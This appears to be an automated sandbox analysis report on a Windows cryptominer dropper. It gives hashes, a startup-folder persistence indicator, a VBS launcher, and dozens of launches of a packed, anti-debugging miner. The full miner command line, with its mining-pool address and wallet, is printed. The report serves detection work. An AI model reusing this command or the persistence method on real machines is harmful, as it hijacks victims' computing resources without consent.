Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
20-05-2024 15:54
Static task
static1
Behavioral task
behavioral1
Sample
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
-
Size
1.6MB
-
MD5
5feee9c9673462dfceb2df85cf8138b5
-
SHA1
18a97e4d1ba48aa7e935e4d0ebf415d7db859c1d
-
SHA256
c8fe094489bbbe929b676647dea128e9ef251d7babe7b6b67ee98d503eb33174
-
SHA512
9f1d6f0bf328fcc930d24dcc9c291b1ca13ef5d742fa0e0f622bfd6890c7da183ee35508e3f4a9b4ddfcbebdeb1e2960d49b00b6a14f28b8198b6e23e5baef1e
-
SSDEEP
49152:Al6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AlD9WuvtY7pHMD
Malware Config
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe -
Executes dropped EXE 45 IoCs
pid Process 2512 csrs.exe 2384 csrs.exe 2896 csrs.exe 2716 csrs.exe 2200 csrs.exe 1408 csrs.exe 1700 csrs.exe 2080 csrs.exe 784 csrs.exe 1720 csrs.exe 1108 csrs.exe 3012 csrs.exe 1160 csrs.exe 2240 csrs.exe 2940 csrs.exe 1900 csrs.exe 2888 csrs.exe 2960 csrs.exe 2748 csrs.exe 340 csrs.exe 1516 csrs.exe 544 csrs.exe 772 csrs.exe 1740 csrs.exe 2764 csrs.exe 2808 csrs.exe 1576 csrs.exe 3048 csrs.exe 2192 csrs.exe 2056 csrs.exe 1520 csrs.exe 2940 csrs.exe 2288 csrs.exe 2012 csrs.exe 2028 csrs.exe 2728 csrs.exe 2424 csrs.exe 1612 csrs.exe 1652 csrs.exe 2868 csrs.exe 1248 csrs.exe 2248 csrs.exe 324 csrs.exe 2764 csrs.exe 1720 csrs.exe -
Loads dropped DLL 45 IoCs
pid Process 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe 2476 WScript.exe -
resource yara_rule behavioral1/files/0x0007000000014358-9.dat vmprotect behavioral1/memory/2476-11-0x0000000004490000-0x00000000047FB000-memory.dmp vmprotect behavioral1/memory/2512-13-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2512-14-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2512-23-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2384-26-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2384-27-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2384-36-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2896-39-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2896-40-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2896-49-0x0000000000E70000-0x00000000011DB000-memory.dmp vmprotect behavioral1/memory/2716-52-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/2716-53-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/2716-62-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/2200-65-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/2200-74-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/1408-77-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/1408-86-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/1700-89-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/1700-90-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/1700-99-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/2080-103-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/2080-112-0x0000000001190000-0x00000000014FB000-memory.dmp vmprotect behavioral1/memory/784-115-0x0000000000330000-0x000000000069B000-memory.dmp vmprotect behavioral1/memory/784-116-0x0000000000330000-0x000000000069B000-memory.dmp vmprotect behavioral1/memory/2476-122-0x0000000004490000-0x00000000047FB000-memory.dmp vmprotect behavioral1/memory/784-126-0x0000000000330000-0x000000000069B000-memory.dmp vmprotect behavioral1/memory/2476-128-0x0000000004690000-0x00000000049FB000-memory.dmp vmprotect behavioral1/memory/1720-130-0x0000000000820000-0x0000000000B8B000-memory.dmp vmprotect behavioral1/memory/1720-139-0x0000000000820000-0x0000000000B8B000-memory.dmp vmprotect behavioral1/memory/1108-142-0x00000000010D0000-0x000000000143B000-memory.dmp vmprotect behavioral1/memory/1108-143-0x00000000010D0000-0x000000000143B000-memory.dmp vmprotect behavioral1/memory/1108-152-0x00000000010D0000-0x000000000143B000-memory.dmp vmprotect behavioral1/memory/2476-156-0x0000000004490000-0x00000000047FB000-memory.dmp vmprotect behavioral1/memory/2476-155-0x0000000004490000-0x00000000047FB000-memory.dmp vmprotect behavioral1/memory/3012-157-0x0000000001170000-0x00000000014DB000-memory.dmp vmprotect behavioral1/memory/3012-166-0x0000000001170000-0x00000000014DB000-memory.dmp vmprotect behavioral1/memory/1160-169-0x0000000001170000-0x00000000014DB000-memory.dmp vmprotect behavioral1/memory/1160-178-0x0000000001170000-0x00000000014DB000-memory.dmp vmprotect behavioral1/memory/2240-182-0x00000000000C0000-0x000000000042B000-memory.dmp vmprotect behavioral1/memory/2240-183-0x00000000000C0000-0x000000000042B000-memory.dmp vmprotect behavioral1/memory/2240-192-0x00000000000C0000-0x000000000042B000-memory.dmp vmprotect behavioral1/memory/2940-196-0x0000000001180000-0x00000000014EB000-memory.dmp vmprotect behavioral1/memory/1900-207-0x0000000001180000-0x00000000014EB000-memory.dmp vmprotect behavioral1/memory/2888-218-0x0000000001180000-0x00000000014EB000-memory.dmp vmprotect behavioral1/memory/2960-229-0x0000000000210000-0x000000000057B000-memory.dmp vmprotect behavioral1/memory/2476-231-0x0000000004490000-0x00000000047FB000-memory.dmp vmprotect behavioral1/memory/2748-241-0x0000000000AB0000-0x0000000000E1B000-memory.dmp vmprotect behavioral1/memory/340-252-0x0000000000E50000-0x00000000011BB000-memory.dmp vmprotect behavioral1/memory/1516-263-0x0000000000230000-0x000000000059B000-memory.dmp vmprotect behavioral1/memory/544-274-0x0000000000DD0000-0x000000000113B000-memory.dmp vmprotect behavioral1/memory/772-285-0x0000000000160000-0x00000000004CB000-memory.dmp vmprotect behavioral1/memory/1740-296-0x00000000012A0000-0x000000000160B000-memory.dmp vmprotect behavioral1/memory/2764-307-0x00000000012A0000-0x000000000160B000-memory.dmp vmprotect behavioral1/memory/2808-318-0x0000000000180000-0x00000000004EB000-memory.dmp vmprotect behavioral1/memory/1576-329-0x0000000000F10000-0x000000000127B000-memory.dmp vmprotect behavioral1/memory/3048-340-0x0000000000F10000-0x000000000127B000-memory.dmp vmprotect behavioral1/memory/2192-351-0x0000000001090000-0x00000000013FB000-memory.dmp vmprotect behavioral1/memory/1520-366-0x00000000011D0000-0x000000000153B000-memory.dmp vmprotect behavioral1/memory/2940-375-0x00000000000C0000-0x000000000042B000-memory.dmp vmprotect behavioral1/memory/2288-384-0x00000000013A0000-0x000000000170B000-memory.dmp vmprotect -
Suspicious use of NtSetInformationThreadHideFromDebugger 44 IoCs
pid Process 2512 csrs.exe 2384 csrs.exe 2896 csrs.exe 2716 csrs.exe 2200 csrs.exe 1408 csrs.exe 1700 csrs.exe 2080 csrs.exe 784 csrs.exe 1720 csrs.exe 1108 csrs.exe 3012 csrs.exe 1160 csrs.exe 2240 csrs.exe 2940 csrs.exe 1900 csrs.exe 2888 csrs.exe 2960 csrs.exe 2748 csrs.exe 340 csrs.exe 1516 csrs.exe 544 csrs.exe 772 csrs.exe 1740 csrs.exe 2764 csrs.exe 2808 csrs.exe 1576 csrs.exe 3048 csrs.exe 2192 csrs.exe 1520 csrs.exe 2940 csrs.exe 2288 csrs.exe 2012 csrs.exe 2028 csrs.exe 2728 csrs.exe 2424 csrs.exe 1612 csrs.exe 1652 csrs.exe 2868 csrs.exe 1248 csrs.exe 2248 csrs.exe 324 csrs.exe 2764 csrs.exe 1720 csrs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2992 wrote to memory of 2476 2992 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 28 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2512 2476 WScript.exe 30 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2384 2476 WScript.exe 32 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2896 2476 WScript.exe 34 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2716 2476 WScript.exe 36 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 2200 2476 WScript.exe 38 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1408 2476 WScript.exe 40 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 1700 2476 WScript.exe 42 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 2080 2476 WScript.exe 44 PID 2476 wrote to memory of 784 2476 WScript.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2512
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2384
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2896
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2716
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2200
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1408
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1700
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2080
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:784
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1720
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1108
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3012
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1160
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2240
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2940
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1900
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2888
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2960
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2748
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:340
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1516
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:544
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:772
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1740
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2764
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2808
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1576
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3048
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2192
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
PID:2056
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1520
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2940
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2288
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2012
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2028
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2728
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2424
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1612
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1652
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2868
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1248
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2248
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:324
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2764
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 153⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1720
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5e3427d9f439aebefa3d9c299e2a94af3
SHA1ffff4672790378677ec30d3634fc593c10dfd37e
SHA2567374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba
SHA512a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b
-
Filesize
1KB
MD5f4b667fe8d75278dffe4fa57d5b7212c
SHA105bc96683ea77d081fedcd810c4de7e9c5bb833a
SHA2564f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922
SHA51252e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41